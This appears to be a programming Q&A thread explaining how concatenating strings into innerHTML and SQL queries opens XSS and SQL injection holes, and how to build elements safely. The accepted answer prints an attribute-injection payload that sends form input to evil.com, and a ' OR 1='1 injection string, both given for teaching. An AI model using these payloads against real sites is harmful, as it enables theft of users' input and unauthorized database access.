# Why/how does concatenating cause XSS or SQL injection vulnerabilities?

Tags: php, javascript, security, concatenation

I was told recently (on here) that concatenating your Javascript will cause XSS vulnerabilities.  I have done my research on here and on google to find out why this bad, but I am not seeing it.

**Part 1 - Javascript:** Apparently something like this is the unsafe way.  Why?  How should you do it instead?

```
// part of a script dynamically making table rows
var el = document.createElement('div');
el.innerHTML = '<input type="text"  id="myId'+id+'"  />';
cellOne.appendChild(el);
```

**Part 2 - MySQL:** I was told that you when you concat SQL, it exposes you to SQL injections.  I am not sure what they meant by concat SQL exactly.  I assume they were not talking about the SQL concat function.  I am guessing they meant:

```
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
```

Or maybe?

```
$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
     $sql .= " AND `col2` = '".$myvar.'";
```

Does this expose you to SQL injection?

The SQL part is academic.  I use PDO to prevent SQL injection.

Comment: Is it best for questions to be one question, not multiple questions in one.  Could you rewrite this to be *either* about XSS or SQL injection and then create another question for the other?

Comment: @ConspicuousCompiler  It's just a matter of categorization or perspective.  It's a concatenation question, not a question of xss or sql injection.

Answer (score 3, accepted):

#### Part 1

It can be, if `id` comes from user input that persists on the page.

The `id` variable may contain...

```
" onchange="(new Image).src='http://evil.com/user-input=' + this.value;" bla="
```

#### Part 2

Unless those variables are escaped using the correct mechanism, there is a vulnerability.

The `$myvar` variable may contain...

```
' OR 1='1
```

Answer (score 3):

How would you do it instead :

```
var el = document.createElement('div');
var input = document.createElement("input");
input.type = 'text';
input.id = 'myId' + id;
el.appendChild(input);
cellOne.appendChild(el);
```

Note this is safer because `.id` cannot inject arbitary html

For more information about XSS attack vectors I recommend reading [OWASP xss article](https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_%28OWASP-DV-003%29#Description_of_the_Issue)

Comment: But if you are declaring var id = 0; or whatever when you call the function, it wouldn't matter right?  There wouldn't be a way to inject arbitrary HTML because, even if something was injected via URL, it's going to get redeclared in the function?

Comment: Yes, but your example above didn't have this code sitting inside a function. So, for all we knew, this stuff was all global.

Comment: @phpmeh I don't know. I'd have to thoroughly understand all the attack vectors. It's better to avoid innerHTML and string concatenation until one understands all the attack vectors.

Comment: @kennis and Raynos,  thanks guys.  i appreciate you taking the time to educate me.  :)

Answer (score -3):

> It's a concatenation question, not a question of xss or sql injection.

Nothing wrong with concatenation itself. It is pretty safe operation.